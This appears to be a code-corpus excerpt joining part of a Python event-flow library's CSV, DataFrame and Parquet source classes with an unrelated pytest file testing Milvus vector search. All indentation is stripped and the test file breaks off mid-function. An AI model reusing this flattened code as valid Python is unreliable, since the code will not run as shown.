if not header and isinstance(key_field, str):
raise ValueError('key_field can only be set to an integer when with_header is false')
if not header and isinstance(time_field, str):
raise ValueError('time_field can only be set to an integer when with_header is false')
def _init(self):
self._event_buffer = queue.Queue(1024)
self._types = []
self._none_columns = set()
def _infer_type(self, value):
lowercase = value.lower()
if lowercase == 'true' or lowercase == 'false':
return 'b'
try:
self._datetime_from_timestamp(value)
return 't'
except ValueError:
pass
try:
int(value)
return 'i'
except ValueError:
pass
try:
float(value)
return 'f'
except ValueError:
pass
if value == '':
return 'n'
return 's'
def _parse_field(self, field, index):
typ = self._types[index]
if typ == 's':
return field
if typ == 'f':
return float(field) if field != '' else math.nan
if typ == 'i':
return int(field) if field != '' else math.nan
if typ == 'b':
lowercase = field.lower()
if lowercase == 'true':
return True
if lowercase == 'false':
return False
if lowercase == '':
return None
raise TypeError(f'Expected boolean, got {field}')
if typ == 't':
if field == '':
return None
return self._datetime_from_timestamp(field)
if typ == 'n':
return None
raise TypeError(f'Unknown type: {typ}')
def _datetime_from_timestamp(self, timestamp):
if self._timestamp_format:
return pandas.to_datetime(timestamp, format=self._timestamp_format).floor('u').to_pydatetime()
else:
return datetime.fromisoformat(timestamp)
def _blocking_io_loop(self):
try:
for path in self._paths:
fs, file_path = url_to_file_system(path, self._storage_options)
with fs.open(file_path, mode='r') as f:
header = None
field_name_to_index = None
if self._with_header:
line = f.readline()
header = next(csv.reader([line]))
field_name_to_index = {}
for i in range(len(header)):
field_name_to_index[header[i]] = i
for line in f:
parsed_line = next(csv.reader([line]))
if self._type_inference:
if not self._types:
for index, field in enumerate(parsed_line):
type_field = self._infer_type(field)
self._types.append(type_field)
if type_field == 'n':
self._none_columns.add(index)
else:
for index in copy.copy(self._none_columns):
type_field = self._infer_type(parsed_line[index])
if type_field != 'n':
self._types[index] = type_field
self._none_columns.remove(index)
for i in range(len(parsed_line)):
parsed_line[i] = self._parse_field(parsed_line[i], i)
element = parsed_line
key = None
if header:
if len(parsed_line) != len(header):
raise ValueError(
f'CSV line with {len(parsed_line)} fields did not match header with {len(header)} fields')
if self._build_dict:
element = {}
for i in range(len(parsed_line)):
element[header[i]] = parsed_line[i]
if self._key_field:
if isinstance(self._key_field, list):
key = []
for single_key_field in self._key_field:
if self._with_header and isinstance(single_key_field, str):
single_key_field = field_name_to_index[single_key_field]
key.append(parsed_line[single_key_field])
else:
key_field = self._key_field
if self._with_header and isinstance(key_field, str):
key_field = field_name_to_index[key_field]
key = parsed_line[key_field]
if self._time_field:
time_field = self._time_field
if self._with_header and isinstance(time_field, str):
time_field = field_name_to_index[time_field]
time_as_datetime = parsed_line[time_field]
else:
time_as_datetime = datetime.now()
self._event_buffer.put(Event(element, key=key, time=time_as_datetime))
except BaseException as ex:
self._event_buffer.put(ex)
self._event_buffer.put(_termination_obj)
def _get_event(self):
event = self._event_buffer.get()
if isinstance(event, BaseException):
raise event
return event
async def _run_loop(self):
asyncio.get_running_loop().run_in_executor(None, self._blocking_io_loop)
def get_multiple():
events = [self._get_event()]
while not self._event_buffer.empty() and len(events) < 128:
events.append(self._get_event())
return events
while True:
events = await asyncio.get_running_loop().run_in_executor(None, get_multiple)
for event in events:
res = await self._do_downstream(event)
if event is _termination_obj:
return res
class DataframeSource(_IterableSource):
"""Use pandas dataframe as input source for a flow.
:param dfs: A pandas dataframe, or dataframes, to be used as input source for the flow.
:param key_field: column to be used as key for events. can be list of columns
:param time_field: column to be used as time for events.
:param id_field: column to be used as ID for events.
for additional params, see documentation of :class:`~storey.flow.Flow`
"""
def __init__(self, dfs: Union[pandas.DataFrame, Iterable[pandas.DataFrame]], key_field: Optional[Union[str, List[str]]] = None,
time_field: Optional[str] = None, id_field: Optional[str] = None, **kwargs):
if key_field is not None:
kwargs['key_field'] = key_field
if time_field is not None:
kwargs['time_field'] = time_field
if id_field is not None:
kwargs['id_field'] = id_field
super().__init__(**kwargs)
if isinstance(dfs, pandas.DataFrame):
dfs = [dfs]
self._dfs = dfs
self._key_field = key_field
self._time_field = time_field
self._id_field = id_field
async def _run_loop(self):
for df in self._dfs:
for namedtuple in df.itertuples():
body = namedtuple._asdict()
index = body.pop('Index')
if len(df.index.names) > 1:
for i, index_column in enumerate(df.index.names):
body[index_column] = index[i]
elif df.index.names[0] is not None:
body[df.index.names[0]] = index
key = None
if self._key_field:
if isinstance(self._key_field, list):
key = []
for key_field in self._key_field:
key.append(body[key_field])
else:
key = body[self._key_field]
time = None
if self._time_field:
time = body[self._time_field]
id = None
if self._id_field:
id = body[self._id_field]
event = Event(body, key=key, time=time, id=id)
await self._do_downstream(event)
return await self._do_downstream(_termination_obj)
class ParquetSource(DataframeSource):
"""Reads Parquet files as input source for a flow.
:parameter paths: paths to Parquet files
:parameter columns : list, default=None. If not None, only these columns will be read from the file.
:parameter start_filter: datetime. If not None, the results will be filtered by partitions and 'filter_column' >= start_filter.
Default is None
:parameter end_filter: datetime. If not None, the results will be filtered by partitions 'filter_column' < end_filter.
Default is None
:parameter filter_column: Optional. if not None, the results will be filtered by this column and before and/or after
"""
def __init__(self, paths: Union[str, Iterable[str]], columns=None, start_filter: Optional[datetime] = None,
end_filter: Optional[datetime] = None, filter_column: Optional[str] = None, **kwargs):
if end_filter or start_filter:
start_filter = datetime.min if start_filter is None else start_filter
end_filter = datetime.max if end_filter is None else end_filter
if filter_column is None:
raise TypeError('Filter column is required when passing start/end filters')
self._paths = paths
if isinstance(paths, str):
self._paths = [paths]
self._columns = columns
self._start_filter = start_filter
self._end_filter = end_filter
self._filter_column = filter_column
self._storage_options = kwargs.get('storage_options')
super().__init__([], **kwargs)
def _read_filtered_parquet(self, path):
fs, file_path = url_to_file_system(path, self._storage_options)
dataset = pq.ParquetDataset(path, filesystem=fs)
if dataset.partitions:
partitions = dataset.partitions.partition_names
partitions_time_attributes = [j for j in legal_time_units if j in partitions]
else:
partitions_time_attributes = []
filters = []
find_filters(partitions_time_attributes, self._start_filter, self._end_filter, filters, self._filter_column)
return pandas.read_parquet(path, columns=self._columns, filters=filters,
storage_options=self._storage_options)
def _init(self):
self._dfs = []
for path in self._paths:
if self._start_filter or self._end_filter:
df = self._read_filtered_parquet(path)
else:
df = pandas.read_parquet(path, columns=self._columns, storage_options=self._storage_options)
drop_reserved_columns(df)
self._dfs.append(df)
|
test_search.py
|
import time
import pdb
import copy
import threading
import logging
from multiprocessing import Pool, Process
import pytest
import numpy as np
from milvus import DataType
from utils import *
dim = 128
segment_row_count = 5000
top_k_limit = 2048
collection_id = "search"
tag = "1970-01-01"
insert_interval_time = 1.5
nb = 6000
top_k = 10
nq = 1
nprobe = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
default_fields = gen_default_fields()
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
raw_vector, binary_entity = gen_binary_entities(1)
entities = gen_entities(nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(nb)
default_query, default_query_vecs = gen_query_vectors(field_name, entities, top_k, nq)
default_binary_query, default_binary_query_vecs = gen_query_vectors(binary_field_name, binary_entities, top_k, nq)
def init_data(connect, collection, nb=6000, partition_tags=None, auto_id=True):
'''
Generate entities and add it in collection
'''
global entities
if nb == 6000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_tags is None:
if auto_id:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)])
else:
if auto_id:
ids = connect.insert(collection, insert_entities, partition_tag=partition_tags)
else:
ids = connect.insert(collection, insert_entities, ids=[i for i in range(nb)], partition_tag=partition_tags)
connect.flush([collection])
return insert_entities, ids
def init_binary_data(connect, collection, nb=6000, insert=True, partition_tags=None):
'''
Generate entities and add it in collection
'''
ids = []
global binary_entities
global raw_vectors
if nb == 6000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_tags is None:
ids = connect.insert(collection, insert_entities)
else:
ids = connect.insert(collection, insert_entities, partition_tag=partition_tags)
connect.flush([collection])
return insert_raw_vectors, insert_entities, ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
if str(connect._cmd("mode")) == "CPU":
if request.param["index_type"] in index_cpu_not_support():
pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
else:
pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10, 2049]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
def test_search_flat(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search fuction, all the search params is corrent, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= top_k_limit:
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
def test_search_field(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search fuction, all the search params is corrent, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k <= top_k_limit:
res = connect.search(collection, query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
# TODO:
@pytest.mark.level(2)
def test_search_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search fuction, all the search params is corrent, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
def test_search_after_index_different_metric_type(self, connect, collection, get_simple_index):
'''
target: test search with different metric_type
method: build index with L2, and search using IP
expected: search ok
'''
search_metric_type = "IP"
index_type = get_simple_index["index_type"]
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=search_metric_type,
search_params=search_param)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == top_k
@pytest.mark.level(2)
def test_search_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search fuction, all the search params is corrent, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, partition_tags=[tag])
assert len(res) == nq
@pytest.mark.level(2)
def test_search_index_partition_B(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search fuction, all the search params is corrent, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
for tags in [[tag], [tag, "new_tag"]]:
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_tags=tags)
else:
res = connect.search(collection, query, partition_tags=tags)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
@pytest.mark.level(2)
def test_search_index_partition_C(self, connect, collection, get_top_k, get_nq):
'''
target: test basic search fuction, all the search params is corrent, test all index params, and build
method: search with the given vectors and tag (tag name not existed in collection), check the result
expected: error raised
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query, partition_tags=["new_tag"])
else:
res = connect.search(collection, query, partition_tags=["new_tag"])
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search fuction, all the search params is corrent, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_tags=["new_tag"])
assert res[0]._distances[0] > epsilon
assert res[1]._distances[0] > epsilon
@pytest.mark.level(2)
def test_search_index_partitions_B(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search fuction, all the search params is corrent, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
tag = "tag"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, new_entities, top_k, nq, search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query, partition_tags=["(.*)tag"])
assert not check_id_result(res[0], ids[0])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
res = connect.search(collection, query, partition_tags=["new(.*)"])
assert res[0]._distances[0] < epsilon
assert res[1]._distances[0] < epsilon
#
# test for ip metric
#
@pytest.mark.level(2)
def test_search_ip_flat(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search fuction, all the search params is corrent, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP")
if top_k <= top_k_limit:
res = connect.search(collection, query)
assert len(res[0]) == top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_ip_after_index(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search fuction, all the search params is corrent, test all index params, and build
method: search with the given vectors, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = get_nq
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = "IP"
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert check_id_result(res[0], ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
@pytest.mark.level(2)
def test_search_ip_index_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
'''
target: test basic search fuction, all the search params is corrent, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
'''
top_k = get_top_k
nq = get_nq
metric_type = "IP"
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
entities, ids = init_data(connect, collection)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type=metric_type,
search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) >= top_k
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert check_id_result(res[0], ids[0])
res = connect.search(collection, query, partition_tags=[tag])
assert len(res) == nq
@pytest.mark.level(2)
def test_search_ip_index_partitions(self, connect, collection, get_simple_index, get_top_k):
'''
target: test basic search fuction, all the search params is corrent, test all index params, and build
method: search collection with the given vectors and tags, check the result
expected: the length of the result is top_k
'''
top_k = get_top_k
nq = 2
metric_type = "IP"
new_tag = "new_tag"
index_type = get_simple_index["index_type"]
if index_type == "IVF_PQ":
pytest.skip("Skip PQ")
connect.create_partition(collection, tag)
connect.create_partition(collection, new_tag)
entities, ids = init_data(connect, collection, partition_tags=tag)
new_entities, new_ids = init_data(connect, collection, nb=6001, partition_tags=new_tag)
get_simple_index["metric_type"] = metric_type
connect.create_index(collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, metric_type="IP", search_params=search_param)
if top_k > top_k_limit:
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
else:
res = connect.search(collection, query)
assert check_id_result(res[0], ids[0])
assert not check_id_result(res[1], new_ids[0])
assert res[0]._distances[0] >= 1 - gen_inaccuracy(res[0]._distances[0])
assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
res = connect.search(collection, query, partition_tags=["new_tag"])
assert res[0]._distances[0] < 1 - gen_inaccuracy(res[0]._distances[0])
# TODO:
# assert res[1]._distances[0] >= 1 - gen_inaccuracy(res[1]._distances[0])
@pytest.mark.level(2)
def test_search_without_connect(self, dis_connect, collection):
'''
target: test search vectors without connection
method: use dis connected instance, call search method and check if search successfully
expected: raise exception
'''
with pytest.raises(Exception) as e:
res = dis_connect.search(collection, default_query)
def test_search_collection_name_not_existed(self, connect):
'''
target: search collection not existed
method: search with the random collection_name, which is not in db
expected: status not ok
'''
collection_name = gen_unique_str(collection_id)
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
def test_search_distance_l2(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Euclidean
expected: the return distance equals to the computed value
'''
nq = 2
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, rand_vector=True, search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
distance_0 = l2(vecs[0], inside_vecs[0])
distance_1 = l2(vecs[0], inside_vecs[1])
res = connect.search(collection, query)
assert abs(np.sqrt(res[0]._distances[0]) - min(distance_0, distance_1)) <= gen_inaccuracy(res[0]._distances[0])
def test_search_distance_l2_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
entities, ids = init_data(connect, id_collection, auto_id=False)
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, rand_vector=True, search_params=search_param)
inside_vecs = entities[-1]["values"]
min_distance = 1.0
min_id = None
for i in range(nb):
tmp_dis = l2(vecs[0], inside_vecs[i])
if min_distance > tmp_dis:
min_distance = tmp_dis
min_id = ids[i]
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], min_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(np.sqrt(res[0]._distances[0]) - min_distance) <= tmp_epsilon
@pytest.mark.level(2)
def test_search_distance_ip(self, connect, collection):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 2
metirc_type = "IP"
search_param = {"nprobe": 1}
entities, ids = init_data(connect, collection, nb=nq)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, rand_vector=True, metric_type=metirc_type,
search_params=search_param)
inside_query, inside_vecs = gen_query_vectors(field_name, entities, top_k, nq, search_params=search_param)
distance_0 = ip(vecs[0], inside_vecs[0])
distance_1 = ip(vecs[0], inside_vecs[1])
res = connect.search(collection, query)
assert abs(res[0]._distances[0] - max(distance_0, distance_1)) <= epsilon
def test_search_distance_ip_after_index(self, connect, id_collection, get_simple_index):
'''
target: search collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
index_type = get_simple_index["index_type"]
nq = 2
metirc_type = "IP"
entities, ids = init_data(connect, id_collection, auto_id=False)
get_simple_index["metric_type"] = metirc_type
connect.create_index(id_collection, field_name, get_simple_index)
search_param = get_search_param(index_type)
query, vecs = gen_query_vectors(field_name, entities, top_k, nq, rand_vector=True, metric_type=metirc_type,
search_params=search_param)
inside_vecs = entities[-1]["values"]
max_distance = 0
max_id = None
for i in range(nb):
tmp_dis = ip(vecs[0], inside_vecs[i])
if max_distance < tmp_dis:
max_distance = tmp_dis
max_id = ids[i]
res = connect.search(id_collection, query)
tmp_epsilon = epsilon
check_id_result(res[0], max_id)
# if index_type in ["ANNOY", "IVF_PQ"]:
# tmp_epsilon = 0.1
# TODO:
# assert abs(res[0]._distances[0] - max_distance) <= tmp_epsilon
def test_search_distance_jaccard_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="JACCARD")
res = connect.search(binary_collection, query)
assert abs(res[0]._distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
def test_search_distance_jaccard_flat_index_L2(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with L2
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = jaccard(query_int_vectors[0], int_vectors[0])
distance_1 = jaccard(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="L2")
with pytest.raises(Exception) as e:
res = connect.search(binary_collection, query)
@pytest.mark.level(2)
def test_search_distance_hamming_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = hamming(query_int_vectors[0], int_vectors[0])
distance_1 = hamming(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="HAMMING")
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1).astype(float)) <= epsilon
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = substructure(query_int_vectors[0], int_vectors[0])
distance_1 = substructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="SUBSTRUCTURE")
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_substructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with SUB
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_sub_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUBSTRUCTURE", replace_vecs=query_vecs)
res = connect.search(binary_collection, query)
assert res[0][0].distance <= epsilon
assert res[0][0].id == ids[0]
assert res[1][0].distance <= epsilon
assert res[1][0].id == ids[1]
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = superstructure(query_int_vectors[0], int_vectors[0])
distance_1 = superstructure(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="SUPERSTRUCTURE")
res = connect.search(binary_collection, query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_search_distance_superstructure_flat_index_B(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with SUPER
expected: the return distance equals to the computed value
'''
top_k = 3
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_vecs = gen_binary_super_vectors(int_vectors, 2)
query, vecs = gen_query_vectors(binary_field_name, entities, top_k, nq, metric_type="SUPERSTRUCTURE", replace_vecs=query_vecs)
res = connect.search(binary_collection, query)
assert len(res[0]) == 2
assert len(res[1]) == 2
assert res[0][0].id in ids
assert res[0][0].distance <= epsilon
assert res[1][0].id in ids
assert res[1][0].distance <= epsilon
@pytest.mark.level(2)
def test_search_distance_tanimoto_flat_index(self, connect, binary_collection):
'''
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with Inner product
expected: the return distance equals to the computed value
'''
nq = 1
int_vectors, entities, ids = init_binary_data(connect, binary_collection, nb=2)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
distance_0 = tanimoto(query_int_vectors[0], int_vectors[0])
distance_1 = tanimoto(query_int_vectors[0], int_vectors[1])
query, vecs = gen_query_vectors(binary_field_name, query_entities, top_k, nq, metric_type="TANIMOTO")
res = connect.search(binary_collection, query)
assert abs(res[0][0].distance - min(distance_0, distance_1)) <= epsilon
@pytest.mark.level(2)
@pytest.mark.timeout(30)
def test_search_concurrent_multithreads(self, connect, args):
'''
target: test concurrent search with multiprocessess
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
'''
nb = 100
top_k = 10
threads_num = 4
threads = []
collection = gen_unique_str(collection_id)
uri = "tcp://%s:%s" % (args["ip"], args["port"])
# create collection
milvus = get_milvus(args["ip"], args["port"], handler=args["handler"])
